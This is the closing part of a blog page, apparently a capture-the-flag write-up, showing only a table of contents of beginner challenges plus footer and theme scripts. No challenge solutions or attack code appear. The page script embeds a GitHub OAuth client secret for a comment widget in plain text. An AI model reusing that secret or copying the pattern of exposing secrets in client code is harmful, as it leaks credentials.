class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#题解-5"><span class="toc-number">7.2.</span> <span class="toc-text">题解</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#strings-100pts"><span class="toc-number">8.</span> <span class="toc-text">strings (100pts)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#题目-6"><span class="toc-number">8.1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#题解-6"><span class="toc-number">8.2.</span> <span class="toc-text">题解</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#pipe-110pts"><span class="toc-number">9.</span> <span class="toc-text">pipe (110pts)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#题目-7"><span class="toc-number">9.1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#题解-7"><span class="toc-number">9.2.</span> <span class="toc-text">题解</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#grep-2-125pts"><span class="toc-number">10.</span> <span class="toc-text">grep 2 (125pts)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#题目-8"><span class="toc-number">10.1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#题解-8"><span class="toc-number">10.2.</span> <span class="toc-text">题解</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Aca-Shell-A-150pts"><span class="toc-number">11.</span> <span class="toc-text">Aca-Shell-A (150pts)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#题目-9"><span class="toc-number">11.1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#题解-9"><span class="toc-number">11.2.</span> <span class="toc-text">题解</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#environ-150pts"><span class="toc-number">12.</span> <span class="toc-text">environ (150pts)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#题目-10"><span class="toc-number">12.1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#题解-10"><span class="toc-number">12.2.</span> <span class="toc-text">题解</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#ssh-keyz-150pts"><span class="toc-number">13.</span> <span class="toc-text">ssh-keyz (150pts)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#题目-11"><span class="toc-number">13.1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#题解-11"><span class="toc-number">13.2.</span> <span class="toc-text">题解</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#what-base-is-this-200pts"><span class="toc-number">14.</span> <span class="toc-text">what base is this? (200pts)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#题目-12"><span class="toc-number">14.1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#题解-12"><span class="toc-number">14.2.</span> <span class="toc-text">题解</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#you-can’t-see-me-200pts"><span class="toc-number">15.</span> <span class="toc-text">you can’t see me (200pts)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#题目-13"><span class="toc-number">15.1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#题解-13"><span class="toc-number">15.2.</span> <span class="toc-text">题解</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#absolutely-relative-250pts"><span class="toc-number">16.</span> <span class="toc-text">absolutely relative (250pts)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#题目-14"><span class="toc-number">16.1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#题解-14"><span class="toc-number">16.2.</span> <span class="toc-text">题解</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#in-out-error-275pts"><span class="toc-number">17.</span> <span class="toc-text">in out error (275pts)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#题目-15"><span class="toc-number">17.1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#题解-15"><span class="toc-number">17.2.</span> <span class="toc-text">题解</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#learn-gdb-300pts"><span class="toc-number">18.</span> <span class="toc-text">learn gdb (300pts)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#题目-16"><span class="toc-number">18.1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#题解-16"><span class="toc-number">18.2.</span> <span class="toc-text">题解</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#roulette-350pts"><span class="toc-number">19.</span> <span class="toc-text">roulette (350pts)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#题目-17"><span class="toc-number">19.1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#题解-17"><span class="toc-number">19.2.</span> <span class="toc-text">题解</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Store-400pts"><span class="toc-number">20.</span> <span class="toc-text">Store (400pts)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#题目-18"><span class="toc-number">20.1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#题解-18"><span class="toc-number">20.2.</span> <span class="toc-text">题解</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#script-me-500pts"><span class="toc-number">21.</span> <span class="toc-text">script me (500pts)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#题目-19"><span class="toc-number">21.1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#题解-19"><span class="toc-number">21.2.</span> <span class="toc-text">题解</span></a></li></ol></li></ol>
        </div>
    </div>
    
  </aside>
</main>

<script type="text/javascript">
const gitalk = new Gitalk({
  clientID: "6ae565c159db15a6167c",
  clientSecret: "6b81331560c108209346bc4807a5126da190e14c",
  repo: "blogcomments",
  owner: "lxzmads",
  admin: "lxzmads",
  id: decodeURI(location.pathname),      // Ensure uniqueness and length less than 50
  distractionFreeMode: "false"  // Facebook-like distraction free mode
})
gitalk.render('gitalk-container')
</script>

  <footer>
  <div class="copyright">
    <div>
      &copy; 2019 | Powered by <a href="https://hexo.io" target="_blank">Hexo</a>&nbsp
    </div>
    <div>
      Theme by <a href="https://github.com/lxzmads/hexo-theme-Aath-magic" target="_blank">Aath-魔改版 by Mads</a>
    </div>
  </div>
</footer>


<script src="/lib/jquery.min.js"></script>
<script src="/lib/in-view.min.js"></script>
<script src="/lib/lodash.min.js"></script>
<script>
  var isDown = true
  var oldY = 0
  inView.offset(50)

  document.body.addEventListener('touchstart', function(){});
  
  window.addEventListener('scroll', _.throttle(e => {
    var currentY = window.scrollY
    if((oldY - currentY) < 0) {
      isDown = true
    } else {
      isDown = false
    }
    oldY = currentY
  }, 250))

  $("article img").each(function() {
      var strA = "<a data-fancybox='gallery' href='" + this.src + "'></a>";
      $(this).wrapAll(strA);
  });

  $('.toc-link').each(function() {
      var href = $(this).attr("href");
      
      inView(href).on('exit', () => {
        if (isDown) {
          handleActive(href)
        }
      })

      inView(href).on('enter', () => {
        if (!isDown) {
          handleActive(href)
        }
      })

      this.onclick = function(e) {
        var pos = $(href).offset().top - 10;
        $("html,body").animate({scrollTop: pos}, 300);
        setTimeout(() => {
          handleActive(href)
        }, 350)
        return false
      }
  })

  function handleActive(href) {
    document.querySelectorAll('.toc-link').forEach(elm => {
      elm.classList.remove('active')
    })
    document.querySelector(".toc [href='"+ href +"']").classList.add('active')
  }
</script>
<script src="/lib/jquery.fancybox.min.js"></script>


</body>
</html>
